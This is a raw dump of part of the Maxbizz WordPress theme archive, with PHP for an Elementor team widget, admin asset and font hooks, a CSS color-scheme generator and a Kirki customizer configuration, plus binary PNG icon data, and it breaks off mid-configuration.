				'label' => __( 'Extra/Job', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);

		$this->add_responsive_control(
			'job_space',
			[
				'label' => esc_html__( 'Spacing', 'maxbizz' ),
				'type'  => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .team-social' => 'margin-top: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'job_color',
			[
				'label'     => esc_html__( 'Color', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-info span' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
				[
					'name'     => 'job_typography',
					'label'    => esc_html__( 'Typography', 'maxbizz' ),
					'selector' => '{{WRAPPER}} .team-info span',
				]
		);

		$this->end_controls_section();

		/* socials */
		$this->start_controls_section(
			'icon_style',
			[
				'label' => esc_html__( 'Socials', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_responsive_control(
			'icon_social_space',
			[
				'label' => esc_html__( 'Spacing', 'maxbizz' ),
				'type'  => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 30,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'margin-right: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_socials',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);

		$this->add_control(
			'icon_social_color',
			[
				'label'     => esc_html__( 'Color', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'color: {{VALUE}};',
					'{{WRAPPER}} .team-social a svg' => 'fill: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'icon_social_bg',
			[
				'label'     => esc_html__( 'Background', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a' => 'background: {{VALUE}}; border-color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'icon_hover_color',
			[
				'label'     => esc_html__( 'Color Hover', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a:hover' => 'color: {{VALUE}};',
					'{{WRAPPER}} .team-social a:hover svg' => 'fill: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'social_hover_bg',
			[
				'label'     => esc_html__( 'Background Hover', 'maxbizz' ),
				'type'      => Controls_Manager::COLOR,
				'default'   => '',
				'selectors' => [
					'{{WRAPPER}} .team-social a:hover' => 'background: {{VALUE}};',
				],
			]
		);

		$this->end_controls_section();
	}

	protected function render() {
		$settings = $this->get_settings_for_display();
		
		$photo = Group_Control_Image_Size::get_attachment_image_html( $settings, 'member_image_size', 'member_image' );
		$tname = $settings['member_name'];
		$overlay = '';

		if ( ! empty( $settings['link']['url'] ) ) {
			$this->add_render_attribute( 'm_link', 'href', $settings['link']['url'] );

			if ( $settings['link']['is_external'] ) {
				$this->add_render_attribute( 'm_link', 'target', '_blank' );
			}

			if ( $settings['link']['nofollow'] ) {
				$this->add_render_attribute( 'm_link', 'rel', 'nofollow' );
			}
			$photo = '<a ' .$this->get_render_attribute_string( 'm_link' ). '>' .$photo. '</a>';
			$tname = '<a ' .$this->get_render_attribute_string( 'm_link' ). '>' .$tname. '</a>';
		}

		$this->add_render_attribute( 'team-box', 'class', 'ot-team team-3 circle-social' );
		if ( $settings['box_animation'] ) {
			$this->add_render_attribute( 'team-box', 'class', 'elementor-animation-' . $settings['box_animation'] );
		}
		?>

		<div <?php echo $this->get_render_attribute_string( 'team-box' ); ?>>
			<div class="team-thumb">
				<?php if( $settings['member_image']['url'] ) { echo $photo; } ?>
			</div>
			<div class="team-info">
				<?php if ( $settings['member_name'] ) { echo '<h6 class="tname">' .$tname. '</h6>'; } ?>
				<?php if ( $settings['member_extra'] ) { echo '<span>' .$settings['member_extra']. '</span>'; } ?>
				<?php if ( ! empty( $settings['social_share'] ) ) : ?>
				<div class="team-social">
					<?php foreach ( $settings['social_share'] as $key => $social ) : ?>
						<?php 
							$link_key = 'link_' . $key;
							$this->add_render_attribute( $link_key, 'class', [
								strtolower($social['title']),
								'elementor-repeater-item-' . $social['_id'],
							] );
						?>
						<?php if ( ! empty( $social['social_link'] ) ) : ?>
							<a <?php echo $this->get_render_attribute_string( $link_key ); ?> <?php if($social['social_link']['is_external'])
							{ echo 'target="_blank"'; }else{ echo 'rel="nofollow"';}?> 
									href="<?php echo $social['social_link']['url'];?>"">
									<?php Icons_Manager::render_icon( $social['social_icon'], [ 'aria-hidden' => 'true' ] ); ?>
							</a>
						<?php endif; ?>
					<?php endforeach; ?>
				</div>
				<?php endif; ?>
			</div>
		</div>
	        
	    <?php
	}

	protected function _content_template() {}
}
// After the Maxbizz_Team3 class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Team3() );PK�8FZ��inc/backend/admin-functions.phpnu�[���<?php

/* admin style */
if ( ! function_exists( 'maxbizz_custom_wp_admin_style' ) ) :
    function maxbizz_custom_wp_admin_style() {
        wp_register_style( 'maxbizz_custom_wp_admin_css', get_template_directory_uri() . '/inc/backend/css/admin-style.css', false, '1.0.0' );
        wp_enqueue_style( 'maxbizz_custom_wp_admin_css' );
        
        wp_enqueue_script( 'maxbizz_custom_wp_admin_js', get_template_directory_uri()."/inc/backend/js/admin-script.js", array( 'jquery' ), '1.0.0', true );
        wp_enqueue_script( 'maxbizz_custom_wp_admin_js' );
    }
    add_action( 'admin_enqueue_scripts', 'maxbizz_custom_wp_admin_style' );
endif;

/* upload SVG file */
function maxbizz_mime_types($mimes) {
  $mimes['svg'] = 'image/svg+xml';
  $mimes['svgz'] = 'image/svg+xml';
  return $mimes;
}
add_filter('upload_mimes', 'maxbizz_mime_types', 10, 1);

/**
 * add group fonts
 */
add_filter( 'elementor/fonts/groups', function( $font_groups ) {
  $font_groups['maxbizz_fonts'] = __( 'Maxbizz Fonts' );
  return $font_groups;
} );

/* Filters the fonts used by Elementor to add additional fonts. */
add_filter( 'elementor/fonts/additional_fonts', function ( $additional_fonts ) {
  $additional_fonts['Inter'] = 'maxbizz_fonts';
  return $additional_fonts;
} );PK�8FZ"�y��inc/backend/images/left.pngnu�[����PNG


IHDRPP���PLTE���������{{{(((���222�����K	tRNS��������7��	pHYs��iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-10-17T16:37:21+07:00" xmp:ModifyDate="2018-10-17T16:45:30+07:00" xmp:MetadataDate="2018-10-17T16:45:30+07:00" dc:format="image/png" photoshop:ColorMode="2" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:ff2aa371-b802-bd42-a88e-3f47c423bd87" xmpMM:DocumentID="xmp.did:ff2aa371-b802-bd42-a88e-3f47c423bd87" xmpMM:OriginalDocumentID="xmp.did:ff2aa371-b802-bd42-a88e-3f47c423bd87"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:ff2aa371-b802-bd42-a88e-3f47c423bd87" stEvt:when="2018-10-17T16:37:21+07:00" stEvt:softwareAgent="Adobe Photoshop CC 2018 (Windows)"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>s�f�HIDATX���1
 ����/��K#ζ��To���gU���r-/��@ �@ �@`c�ﹰ�Y�B7�;IEND�B`�PK�8FZ����inc/backend/images/full.pngnu�[����PNG


IHDRPP���PLTE���������{{{(((���222�����K	tRNS��������7��	pHYs��iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-10-17T16:45:05+07:00" xmp:ModifyDate="2018-10-17T16:48:25+07:00" xmp:MetadataDate="2018-10-17T16:48:25+07:00" dc:format="image/png" photoshop:ColorMode="2" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:b4181c08-026c-4b4f-ad6c-5706bd78192b" xmpMM:DocumentID="xmp.did:b4181c08-026c-4b4f-ad6c-5706bd78192b" xmpMM:OriginalDocumentID="xmp.did:b4181c08-026c-4b4f-ad6c-5706bd78192b"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:b4181c08-026c-4b4f-ad6c-5706bd78192b" stEvt:when="2018-10-17T16:45:05+07:00" stEvt:softwareAgent="Adobe Photoshop CC 2018 (Windows)"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>W�eBIDATX��ٱ
 �b��a�4��R'�n��=3����@ �@ �@ �������8�.IEND�B`�PK�8FZ��"��inc/backend/images/right.pngnu�[����PNG


IHDRPP���PLTE���������((({{{222���������	tRNS��������7��	pHYs��iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmp:CreateDate="2018-10-17T16:37:21+07:00" xmp:ModifyDate="2018-10-17T16:44:29+07:00" xmp:MetadataDate="2018-10-17T16:44:29+07:00" dc:format="image/png" photoshop:ColorMode="2" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:f9108ad5-1974-b348-8150-b831bd4e1372" xmpMM:DocumentID="xmp.did:f9108ad5-1974-b348-8150-b831bd4e1372" xmpMM:OriginalDocumentID="xmp.did:f9108ad5-1974-b348-8150-b831bd4e1372"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:f9108ad5-1974-b348-8150-b831bd4e1372" stEvt:when="2018-10-17T16:37:21+07:00" stEvt:softwareAgent="Adobe Photoshop CC 2018 (Windows)"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�]�:FIDATX��ٱ	 �����:���x�s�:I�f4{�ପu�ɱ�&�@ �@ �@ ؘ�w.l�Y�4�IEND�B`�PK�8FZZ��U+U+inc/backend/color.phpnu�[���<?php 

//Custom Style Frontend
if(!function_exists('maxbizz_color_scheme')){
    function maxbizz_color_scheme(){
	  $color_scheme = '';

	  //Main Color
	  	if( maxbizz_get_option('main_color') != '#fe8423' ){
			$color_scheme = 
			'
		  	/****Main Color****/

			/*Background Color*/
			.bg-primary,
			.list-primary li:before,
			.btn-details:hover,
			.owl-carousel .owl-dots button.owl-dot.active span,
			.owl-carousel .owl-dots button.owl-dot:hover span,
			.owl-carousel .owl-nav button.owl-prev:hover,.owl-carousel .owl-nav button.owl-next:hover,
			.octf-btn,
			.octf-btn-dark:hover, .octf-btn-dark:focus,
			.octf-btn-light:hover, .octf-btn-light:focus,
			.octf-btn.octf-btn-border:hover, .octf-btn.octf-btn-border:focus,
			.main-navigation > ul > li:before,
			.post-box .post-cat a,
			.post-box .btn-play:hover i,
			.page-pagination li span, .page-pagination li a:hover,
			.blog-post .share-post a,
			.post-nav > div .thumb-post:before,
			.post-nav .post-prev.not-thumb a:hover .thumb-post:before,
			.post-nav .post-next.not-thumb a:hover .thumb-post:before,
			.widget-area .widget .widget-title:before,
			.widget-area .widget_categories ul li a:before,.widget-area .widget_product_categories ul li a:before,.widget-area .widget_archive ul li a:before,
			.search-form .search-submit,
			.author-widget_social a:hover,
			.bline-yes .icon-box-1:after,
			.bline-yes .icon-box-2 .content-box:after,
			.box-s2.icon-right .icon-main,
			.ot-image-box:hover .link-box,
			.line-progress .progress-bar,
			.ot-pricing-table.is-featured .inner-table .title-table span,
			.ot-pricing-table.is-featured .octf-btn,
			.circle-social .team-social a:hover,
			.ot-accordions .acc-item.current .acc-toggle,
			.ot-testimonials .tphoto:after,
			.ot-message-box .icon-main,
			.ot-minicart .count,
			.ot-heading > span.is_line:before,
			.mc4wp-form-fields .subscribe-inner-form .subscribe-btn-icon:hover,
			#back-to-top,
			.error-404 .page-content form button:hover,
			.woocommerce ul.products li.product .added_to_cart, .woocommerce ul.products li.product .product_type_grouped, .woocommerce-page ul.products li.product .added_to_cart, .woocommerce-page ul.products li.product .product_type_grouped,
			.woocommerce #respond input#submit.alt, .woocommerce a.button.alt,.woocommerce button.button.alt, .woocommerce input.button.alt,.woocommerce #respond input#submit, .woocommerce a.button,.woocommerce input.button, .woocommerce button.button.alt.disabled,
			.woocommerce button.button,
			.woocommerce-mini-cart__buttons a.button.wc-forward,
			.woocommerce-mini-cart__buttons a.button.wc-forward:hover{ background: '.maxbizz_get_option('main_color').'; }
			.post-box .entry-meta .btn-details:hover, 
			.widget .tagcloud a:hover,
			.ot-heading > span.is_highlight,
			.icon-box-1 .icon-main{background: '.hex2rgba(maxbizz_get_option('main_color'), 0.1).';}
			.team-3 .team-thumb a:before{background: '.hex2rgba(maxbizz_get_option('main_color'), 0.8).';}
			.projects-grid .projects-box .portfolio-info,
			.projects-grid.style-3 .projects-thumbnail .overlay{background: '.hex2rgba(maxbizz_get_option('main_color'), 0.9).';}

			/*Background Image*/
			.author-widget_wrapper:before{ background-image: linear-gradient(230deg, '.maxbizz_get_option('main_color').' -150%, #fff 80%); }

			/*Border Color*/
			.octf-btn.octf-btn-border,
			.post-box .entry-meta .btn-details:hover,
			.post-box .btn-play:hover i,
			.page-pagination li span, .page-pagination li a:hover,
			.blog-post .tagcloud a:hover,
			.widget .tagcloud a:hover,
			.ot-heading > span.is_highlight,
			.ot-image-box:hover .link-box,
			.ot-accordions .acc-item.current .acc-toggle,
			.ot-tabs .tab-link.current, .ot-tabs .tab-link:hover,
			.ot-video-button a:hover span,
			.woocommerce div.product .woocommerce-tabs ul.tabs li a:hover,
			.woocommerce div.product .woocommerce-tabs ul.tabs li.active a{ border-color: '.maxbizz_get_option('main_color').'; }

			/*Border Top Color*/
			.woocommerce-message,
			.woocommerce-info{ border-top-color: '.maxbizz_get_option('main_color').'; }

			/*Color*/
			blockquote:before,
			blockquote cite,
			.text-primary,
			.link-details,
			.link-details:visited,
			.octf-btn.octf-btn-border,
			.octf-btn.octf-btn-border:visited,
			a:hover, a:focus, a:active,
			.main-navigation > ul > li:hover > a,
			.main-navigation ul li li a:hover,.main-navigation ul ul.sub-menu li.current-menu-item > a,.main-navigation ul ul.sub-menu li.current-menu-ancestor > a,
			.main-navigation ul > li.menu-item-has-children:hover > a,
			.main-navigation ul > li.menu-item-has-children:hover > a:after,
			.main-navigation ul > li.menu-item-has-children > a:hover:after,
			.header_mobile .mobile_nav .mobile_mainmenu li li a:hover,.header_mobile .mobile_nav .mobile_mainmenu ul > li > ul > li.current-menu-ancestor > a,
			.header_mobile .mobile_nav .mobile_mainmenu > li > a:hover, .header_mobile .mobile_nav .mobile_mainmenu > li.current-menu-item > a,.header_mobile .mobile_nav .mobile_mainmenu > li.current-menu-ancestor > a,
			.post-box .entry-meta a:hover,
			.post-box .entry-meta .btn-details:hover,
			.post-box .entry-title a:hover,
			.post-box .link-box a:hover,
			.post-box .link-box i,
			.post-box .quote-box i,
			.post-box .quote-box .quote-text span,
			.blog-post .tagcloud a:hover,
			.blog-post .author-bio .author-info .author-socials a:hover,
			.comments-area .comment-item .comment-meta .comment-reply-link,
			.comment-respond .comment-reply-title small a:hover,
			.comment-form .logged-in-as a:hover,
			.widget .tagcloud a:hover,
			.widget-area .widget ul:not(.recent-news) > li a:hover,
			.widget-area .widget_categories ul li a:hover + span.posts-count,.widget-area .widget_product_categories ul li a:hover + span.posts-count,.widget-area .widget_archive ul li a:hover + span.posts-count,
			.ot-heading > span,
			.icon-box .icon-main,
			.icon-box-grid .icon-box .icon-main,
			.icon-box-grid .icon-box .content-box .title-box a:hover,
			.icon-box-grid .icon-box:hover .icon-main,
			.ot-image-box .link-box,
			.ot-counter span,
			.ot-counter-2 i,
			.ot-countdown li.seperator,
			.ot-pricing-table .inner-table h2,
			.project_filters li a:before,
			.project_filters li a .filter-count,
			.project_filters li a.selected, .project_filters li a:hover,
			.ot-team .team-info span,
			.ot-testimonials .t-head span,
			.woocommerce ul.products li.product .price .woocommerce-Price-amount, .woocommerce-page ul.products li.product .price .woocommerce-Price-amount,
			.woocommerce table.shop_table td.product-price, .woocommerce table.shop_table td.product-subtotal,
			.woocommerce-message:before,
			.woocommerce-info:before,
			.woocommerce .woocommerce-Price-amount,
			.woocommerce .site ul.product_list_widget li a:not(.remove):hover,
			.woocommerce .woocommerce-widget-layered-nav-list li a:hover,
			.woocommerce .widget_price_filter .price_slider_amount button.button,
			.woocommerce div.product p.price,.woocommerce div.product span.price{ color: '.maxbizz_get_option('main_color').'; }

			/*Other*/
			.icon-box .icon-main svg,
			.icon-box-grid .icon-box .icon-main svg,
			.ot-counter-2 svg{ fill: '.maxbizz_get_option('main_color').'; }
				';
		}

	  	if(! empty($color_scheme)){
			echo '<style type="text/css">'.$color_scheme.'</style>';
		}
    }
}
add_action('wp_head', 'maxbizz_color_scheme');

//Custom Second Font
if(!function_exists('maxbizz_second_font')){
	function maxbizz_second_font(){
		$second_font = maxbizz_get_option( 'second_font', [] );

		if ( $second_font['font-family'] != '' && $second_font['font-family'] != 'Inter' ) {
			$data_font = 
			'h1, h2, h3, h4, h5, h6,
			blockquote,
			.font-second,
			.link-details,
			.slide-rev-subtitle,
			.octf-btn,
			select,
			.main-navigation ul,
			.page-header,
			.post-box .post-cat a,
			.post-box .entry-meta,
			.post-box .link-box a,
			.post-box .quote-box .quote-text,
			.page-pagination li a, .page-pagination li span,
			.blog-post .tagcloud a,
			.drop-cap,
			.post-nav,
			.comments-area .comment-item .comment-meta .comment-time,
			.comments-area .comment-item .comment-meta .comment-reply-link,
			.comment-form .logged-in-as,
			.widget .tagcloud a,
			.widget table,
			.widget .recent-news .post-on,
			.ot-heading,
			.ot-flip-box .number-title span,
			.ot-counter,
			.ot-counter span,
			.ot-countdown li span,
			.line-progress .percent,
			.project_filters li a,
			.projects-grid .projects-box .portfolio-info .portfolio-cates,
			.project-slider .projects-box .portfolio-info .portfolio-cates,
			.ot-team .team-info span,
			.member-info li span,
			.ot-accordions .acc-item .acc-toggle,
			.ot-tabs .tab-link,
			.ot-testimonials .t-head,
			.features-service-wrapper .features-service-item .features-service-content,
			div.elementor-widget-heading.elementor-widget-heading .elementor-heading-title,
			.elementor-element .elementor-widget-button .elementor-button,
			.elementor-default .elementor-widget-text-editor .elementor-drop-cap,
			.elementor-widget-wp-widget-polylang .lang-item,
			#lang_choice_wp-widget-polylang,
			.mmenu-wrapper .mobile_mainmenu,
			.woocommerce ul.products li.product, .woocommerce-page ul.products li.product,
			.woocommerce ul.products li.product .added_to_cart, .woocommerce ul.products li.product .product_type_grouped, .woocommerce-page ul.products li.product .added_to_cart, .woocommerce-page ul.products li.product .product_type_grouped,
			.woocommerce table.shop_table,
			.woocommerce .quantity .qty,
			.cart_totals h2,
			#add_payment_method .cart-collaterals .cart_totals table td, #add_payment_method .cart-collaterals .cart_totals table th,.woocommerce-cart .cart-collaterals .cart_totals table td, .woocommerce-cart .cart-collaterals .cart_totals table th,.woocommerce-checkout .cart-collaterals .cart_totals table td, .woocommerce-checkout .cart-collaterals .cart_totals table th,
			.woocommerce .site ul.product_list_widget li a:not(.remove),
			.woocommerce .widget_shopping_cart .cart_list .quantity,
			.woocommerce .widget_shopping_cart .total strong,.woocommerce.widget_shopping_cart .total strong,
			.woocommerce .widget_shopping_cart .total .woocommerce-Price-amount,.woocommerce.widget_shopping_cart .total .woocommerce-Price-amount,
			.woocommerce-mini-cart__buttons a.button.wc-forward,
			.woocommerce .woocommerce-widget-layered-nav-list,
			.woocommerce .widget_price_filter .price_slider_amount,
			.woocommerce .widget_price_filter .price_slider_amount button.button,
			.product_meta > span,
			.woocommerce div.product .entry-summary p.price,.woocommerce div.product .entry-summary span.price{ font-family: '.sprintf( $second_font['font-family'] ).';}
		    ';
		}

		if(! empty($data_font)){
			echo '<style type="text/css">'.$data_font.'</style>';
		}
	}
}
add_action('wp_head', 'maxbizz_second_font');PK�8FZ",�����%inc/backend/customizer/customizer.phpnu�[���<?php
/**
 * Theme customizer
 *
 * @package Maxbizz
 */

// Exit if accessed directly
if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

class Maxbizz_Customize {
	/**
	 * Customize settings
	 *
	 * @var array
	 */
	protected $config = array();

	/**
	 * The class constructor
	 *
	 * @param array $config
	 */
	public function __construct( $config ) {
		$this->config = $config;

		if ( ! class_exists( 'Kirki' ) ) {
			return;
		}

		$this->register();
	}

	/**
	 * Register settings
	 */
	public function register() {

		/**
		 * Add the theme configuration
		 */
		if ( ! empty( $this->config['theme'] ) ) {
			Kirki::add_config(
				$this->config['theme'], array(
					'capability'  => 'edit_theme_options',
					'option_type' => 'theme_mod',
				)
			);
		}

		/**
		 * Add panels
		 */
		if ( ! empty( $this->config['panels'] ) ) {
			foreach ( $this->config['panels'] as $panel => $settings ) {
				Kirki::add_panel( $panel, $settings );
			}
		}

		/**
		 * Add sections
		 */
		if ( ! empty( $this->config['sections'] ) ) {
			foreach ( $this->config['sections'] as $section => $settings ) {
				Kirki::add_section( $section, $settings );
			}
		}

		/**
		 * Add fields
		 */
		if ( ! empty( $this->config['theme'] ) && ! empty( $this->config['fields'] ) ) {
			foreach ( $this->config['fields'] as $name => $settings ) {
				if ( ! isset( $settings['settings'] ) ) {
					$settings['settings'] = $name;
				}

				Kirki::add_field( $this->config['theme'], $settings );
			}
		}
	}

	/**
	 * Get config ID
	 *
	 * @return string
	 */
	public function get_theme() {
		return $this->config['theme'];
	}

	/**
	 * Get customize setting value
	 *
	 * @param string $name
	 *
	 * @return bool|string
	 */
	public function get_option( $name ) {

		$default = $this->get_option_default( $name );

		return get_theme_mod( $name, $default );
	}

	/**
	 * Get default option values
	 *
	 * @param $name
	 *
	 * @return mixed
	 */
	public function get_option_default( $name ) {
		if ( ! isset( $this->config['fields'][ $name ] ) ) {
			return false;
		}

		return isset( $this->config['fields'][ $name ]['default'] ) ? $this->config['fields'][ $name ]['default'] : false;
	}
}

/**
 * This is a short hand function for getting setting value from customizer
 *
 * @param string $name
 *
 * @return bool|string
 */
function maxbizz_get_option( $name ) {
	global $maxbizz_customize;

	$value = false;

	if ( class_exists( 'Kirki' ) ) {
		$value = Kirki::get_option( 'maxbizz', $name );
	} elseif ( ! empty( $maxbizz_customize ) ) {
		$value = $maxbizz_customize->get_option( $name );
	}

	return apply_filters( 'maxbizz_get_option', $value, $name );
}

/**
 * Get default option values
 *
 * @param $name
 *
 * @return mixed
 */
function maxbizz_get_option_default( $name ) {
	global $maxbizz_customize;

	if ( empty( $maxbizz_customize ) ) {
		return false;
	}

	return $maxbizz_customize->get_option_default( $name );
}

/**
 * Move some default sections to `general` panel that registered by theme
 *
 * @param object $wp_customize
 */
function maxbizz_customize_modify( $wp_customize ) {
	$wp_customize->get_section( 'title_tagline' )->panel     = 'general';
	$wp_customize->get_section( 'static_front_page' )->panel = 'general';
}

add_action( 'customize_register', 'maxbizz_customize_modify' );


/**
 * Get customize settings
 *
 * Priority (Order) WordPress Live Customizer default: 
 * @link https://developer.wordpress.org/themes/customize-api/customizer-objects/
 *
 * @return array
 */
function maxbizz_customize_settings() {
	/**
	 * Customizer configuration
	 */

	$settings = array(
		'theme' => 'maxbizz',
	);

	$panels = array(
		'general'         => array(
			'priority'    => 5,
			'title'       => esc_html__( 'General', 'maxbizz' ),
        ),
        'blog'        => array(
			'title'      => esc_html__( 'Blog', 'maxbizz' ),
			'priority'   => 10,
			'capability' => 'edit_theme_options',
		),
        'portfolio'       => array(
			'title'       => esc_html__( 'Portfolio', 'maxbizz' ),
			'priority'    => 10,
			'capability'  => 'edit_theme_options',			
		),
	);

	$sections = array(
        /* header */
        'main_header'     => array(
            'title'       => esc_html__( 'Header', 'maxbizz' ),
            'description' => '',
            'priority'    => 8,
            'capability'  => 'edit_theme_options',
        ),
        /* page header */
        'page_header'     => array(
            'title'       => esc_html__( 'Page Header', 'maxbizz' ),
            'description' => '',
            'priority'    => 9,
            'capability'  => 'edit_theme_options',
        ),
        /* blog */
        'blog_page'           => array(
			'title'       => esc_html__( 'Blog Page', 'maxbizz' ),
			'description' => '',
			'priority'    => 10,
			'capability'  => 'edit_theme_options',
			'panel'       => 'blog',
		),
        'single_post'           => array(
			'title'       => esc_html__( 'Single Post', 'maxbizz' ),
			'description' => '',
			'priority'    => 10,
			'capability'  => 'edit_theme_options',
			'panel'       => 'blog',
        ),
        /* footer */
        'footer'         => array(
			'title'      => esc_html__( 'Footer', 'maxbizz' ),
			'priority'   => 10,
			'capability' => 'edit_theme_options',
		),
        /* portfolio */
        'portfolio_page'  => array(
			'title'       => esc_html__( 'Archive Page', 'maxbizz' ),
			'priority'    => 10,
			'capability'  => 'edit_theme_options',
			'panel'       => 'portfolio',			
		),
		'portfolio_post'  => array(
			'title'       => esc_html__( 'Single Page', 'maxbizz' ),
			'priority'    => 10,
			'capability'  => 'edit_theme_options',
			'panel'       => 'portfolio',			
		),
		/* typography */
		'typography'           => array(
            'title'       => esc_html__( 'Typography', 'maxbizz' ),
            'description' => '',
            'priority'    => 15,
            'capability'  => 'edit_theme_options',
        ),
		/* 404 */
		'error_404'       => array(
            'title'       => esc_html__( '404', 'maxbizz' ),
            'description' => '',
            'priority'    => 11,
            'capability'  => 'edit_theme_options',
        ),
        /* color scheme */
        'color_scheme'   => array(
			'title'      => esc_html__( 'Color Scheme', 'maxbizz' ),
			'priority'   => 200,
			'capability' => 'edit_theme_options',
		),
		/* js code */
		'script_code'   => array(
			'title'      => esc_html__( 'Google Analytics(Script Code)', 'maxbizz' ),
			'priority'   => 210,
			'capability' => 'edit_theme_options',
		),
	);

	$fields = array(
        /* header settings */
		'header_layout'   => array(
			'type'        => 'select',  
	 		'label'       => esc_attr__( 'Select Header Desktop', 'maxbizz' ), 
	 		'description' => esc_attr__( 'Choose the header on desktop.', 'maxbizz' ), 
	 		'section'     => 'main_header', 
	 		'default'     => '', 
	 		'priority'    => 3,
	 		'placeholder' => esc_attr__( 'Select a header', 'maxbizz' ), 
	 		'choices'     => ( class_exists( 'Kirki_Helper' ) ) ? Kirki_Helper::get_posts( array( 'post_type' => 'ot_header_builders', 'posts_per_page' => -1 ) ) : array(),
		),
		'header_fixed'    => array(
            'type'        => 'toggle',
			'label'       => esc_html__( 'Header Transparent?', 'maxbizz' ),
	 		'description' => esc_attr__( 'Enable when your header is transparent.', 'maxbizz' ), 
            'section'     => 'main_header',
			'default'     => '1',
			'priority'    => 4,
        ),
        'header_mobile'   => array(
			'type'        => 'select',  
	 		'label'       => esc_attr__( 'Select Header Mobile', 'maxbizz' ), 
	 		'description' => esc_attr__( 'Choose the header on mobile.', 'maxbizz' ), 
	 		'section'     => 'main_header', 
	 		'default'     => '', 
	 		'priority'    => 5,
	 		'placeholder' => esc_attr__( 'Select a header', 'maxbizz' ), 
	 		'choices'     => ( class_exists( 'Kirki_Helper' ) ) ? Kirki_Helper::get_posts( array( 'post_type' => 'ot_header_builders', 'posts_per_page' => -1 ) ) : array(),
        ),
        'sidepanel_layout'     => array(
			'type'        => 'select',  
	 		'label'       => esc_attr__( 'Select Side Panel', 'maxbizz' ), 
	 		'description' => esc_attr__( 'Choose the side panel on header.', 'maxbizz' ), 
	 		'section'     => 'main_header', 
	 		'default'     => '', 
	 		'priority'    => 6,
